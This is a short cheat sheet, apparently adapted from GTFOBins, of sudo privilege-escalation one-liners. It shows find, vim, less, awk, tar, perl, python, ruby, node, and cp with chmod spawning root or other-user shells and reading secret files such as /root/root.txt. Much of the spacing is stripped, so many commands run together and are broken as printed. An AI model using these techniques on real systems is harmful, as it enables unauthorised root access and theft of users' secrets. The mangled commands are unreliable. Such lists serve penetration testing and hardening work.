GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems. The project collects legitimate functions of Unix binaries that can be abused to get the f**k break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.
Unix Commands - Examples
# Findsudofind.-exec/bin/sh \; -quitsudo-uvictim/usr/bin/find/home-exec/bin/sh \; -quit# for victim# Vimsudovim-c':!/bin/sh'sudovim## and type:!/bin/bashsudo-uvictim/usr/bin/vim# for victim user ## and type:!/bin/bash# Lesssudo/usr/bin/less/etc/profilesudo-uvictim/usr/bin/less.profile# for victim user## and type!/bin/sh# Awksudoawk'BEGIN {system("/bin/sh")}'awk'{print $0}'/home/victim/key.txt# cp and chmod to escalate to victimcd/tmpgcc-ofile.c-ofilesudo-uvictim/bin/cpfilefile2# for victim usersudo-uvictim/bin/chmodx+sfile2# for victim user./file2# to escalate# tarsudotar-cf/dev/null/dev/null--checkpoint=1--checkpoint-action=exec=/bin/sh# or touchsomefilesudotarcf/dev/nullsomefile--checkpoint=1--checkpoint-action=exec=/bin/shid# uid=0(root) gid=0(root) groups=0(root)# perl sudo/usr/bin/perl-e'exec "/bin/sh";'sudo-uvictim/usr/bin/perl-e'exec "/bin/sh";'# for victim sudo/usr/bin/perl-e'print `cat /root/root.txt`'sudo-uvictim/usr/bin/perl-e'print `cat /home/victim/key.txt`'# for victim username# pythonsudo/usr/bin/python-c'import os; os.execl("/bin/sh", "sh", "-p")'sudo-uvictim/usr/bin/python-c'import os; os.system("cat /home/victim/key.txt")'# rubysudo/usr/bin/ruby-e'exec "/bin/sh"'sudo-uvictim/usr/bin/ruby-e'require "irb" ; IRB.start(__FILE__)'system("cat /home/victim/key.txt")# node to escalatesudonode-e'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'# node to read files sudo -u victim /usr/local/bin/node -e "var exec = require('child_process').exec;exec('cat /home/victim/key.txt', function (error, stdOut, stdErr) { console.log(stdOut);});"